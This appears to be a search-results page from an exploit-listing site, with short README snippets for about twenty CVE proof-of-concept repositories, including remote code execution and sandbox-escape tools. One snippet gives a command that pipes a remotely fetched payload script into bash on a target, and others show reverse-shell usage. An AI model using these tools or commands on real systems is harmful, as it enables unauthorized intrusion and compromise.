12904 matches found
CVE-2021-26814
CVE-2021-26814 A simple python PoC to exploit CVE-2021-26814 and gain RCE on Wazuh Manager v.4.0.0-4.0.3 through the API service. To run it, simply make the .py script executable and launch it with the required parameters. root@kitploit: PoC.py -h -user USERNAME -pwd PASSWORD -lip SRCIP -lport...
CVE-2024-32462
CVE-2024-32462 CVE-2024-32462 code exec sbx escape How the directory should look to compile this root@kitploit: ├── org.exploit.SandboxEscape.yaml ├── exploit.py └── app/ └── exploit.desktop How to run & build 1.Install Flatpak SDK if needed: root@kitploit: flatpak install flathub...
CVE-2023-46818
CVE-2023-46818 PoC This is a python implemntation of the PoC provided by Egidio Romano aka EgiX Over here, this exploit will prompt you a webshell, for a fully interactive shell execute a command and send yourself a reveseshell. Usage root@kitploit: python exploit.py http://localhost username...
CVE-2021-44228-poc
CVE-2021-44228-poc CVE-2021-44228 POC / Example...
CVE-2024-32019-poc
CVE-2024-32019-poc Netdata ndsudo PoC Build the binary: root@kitploit: go build -ldflags "-s -w" -o nvme poc.go upx nvme Run the bash script: root@kitploit: bash exploit.sh In target machine run in a writable directory: root@kitploit: curl http://:8000/payload.sh | bash It will automatically...
CVE-2019-3980
CVE-2019-3980 CVE-2019-3980 exploit written in win32/c++ openssl dependency. Port of https://github.com/tenable/poc/blob/master/Solarwinds/Dameware/dwrcsdwDrvInstrce.py Instructions This PoC requires staticly linked openssl libraries. Place openssl includes in thirdparty\include\openssl and libs ...
RCE-PoC-CVE-2021-25646
CVE-2021-25646 概念验证(Go 版本) 概述 本仓库包含针对 CVE-2021-25646 的概念验证(PoC)漏洞利用代码,该漏洞是 Apache Druid 中的一个严重远程代码执行漏洞。 该漏洞利用程序使用 Go 编写,可通过终端进行交互式命令注入。 特性 交互式命令注入: 通过交互式 shell 界面,在存在漏洞的 Apache Druid 服务器上执行任意命令。 构建 你需要安装 Go(推荐版本 2.23.4)。 root@kitploit: go build . 这将在当前目录下生成一个二进制文件。 用法 你可以通过构建二进制文件或直接使用 go run...
cve-2018-12386
Firefox Sandboxed RCE Exploit CVE-2018-12386 Here is a simple exploit for the vulnerability CVE-2018-12386 found by Niklas Baumstark, Samuel Groß and Bruno Keith. This is mostly a PoC I did for fun, there is no sandbox bypass and it will only work on a given Linux setup where the offsets used by...
CVE-2020-14882_POC
CVE-2020-14882 Batch Verification Usage python3 CVE-2020-14882.py Put the targets in target.txt, one per line Example...
PoC-public
PoC-public 此仓库收集我们在各安全会议上发布的 PoC 代码。 Black Hat EU 2020 CODE BLUE 2021 Black Hat Asia 2023 CODE BLUE 2023...
struts2-jakarta-inject
POC Exploit for CVE-2017-5638 Only use this exploit on systems you own or have explicit rights to test Installation If you have go already installed on your computer, go get is the way to go go get github.com/Greynad/struts2-jakarta-inject Usage Single command execution struts2-jakarta-inject -u ...
CVE-2019-0708
CVE-2019-0708 PoC exploit for BlueKeep CVE-2019-0708 Usage: ./PoC.py TARGET IP PORT...
cont-flood-poc
PoC for CVE-2023-45288 This is a proof-of-concept code for the CONTINUATION flood vulnerability found and documented by Bartek Nowotarski. The technical details are very well documented in his blog post here. While my focus was on the Go bug as documented by the researcher, this code should be...
CVE-2023-3460
CVE-2023-3460 Exploit for CVE-2023-3460 - Unauthorized admin access for Ultimate Member plugin. PoC is now published. It was created for educational/research purposes only! Use it at your own risk!...
CVE-2022-47966
CVE-2022-47966 针对以下 ManageEngine 产品的 CVE-2022-47966 的 POC: Access Manager Plus Active Directory 360 ADAudit Plus ADManager Plus ADSelfService Plus Analytics Plus Application Control Plus Asset Explorer Browser Security Plus Device Control Plus Endpoint Central Endpoint Central MSP Endpoint DLP Ke...
CVE-2023-6019
Python POC Derived from Authors POC Usage python3 CVE-2023-6019.py -t 192.168.191.37 -p 9000 -l 192.168.45.xxx -lp 4444...
CVE-2013-3827
CVE-2013-3827 Quick PoC checker for common configurations that might be available via directory traversal due to CVE-2013-3827 Usage: 1. Modify the contents of traversal.py to match your needs 2. python3 traversal.py...
CVE-2021-34527-Scanner-Based-On-cube0x0-POC
This is a scanner for the service Windows-Print-Spooler in risk Based on CVE-2021-34527 PoC originally created by cube0x0...
CVE-2021-41773
CVE-2021-41773 Go language poc&exp project. Disclaimer: This project comes from the author's daily study notes. Do not use related technologies and tools for illegal testing. The author shall not be liable for any adverse consequences arising therefrom. Usage: root@kitploit: ./main -u Single URL...
CVE-2022-22954-POC
CVE-2022-22954-POC VMware Workspace ONE Access formerly known as VMware Identity Manager aims to allow your employees to access SaaS, web, and native mobile applications faster through multi-factor authentication, conditional access, and single sign-on. Recently, the VMware official website...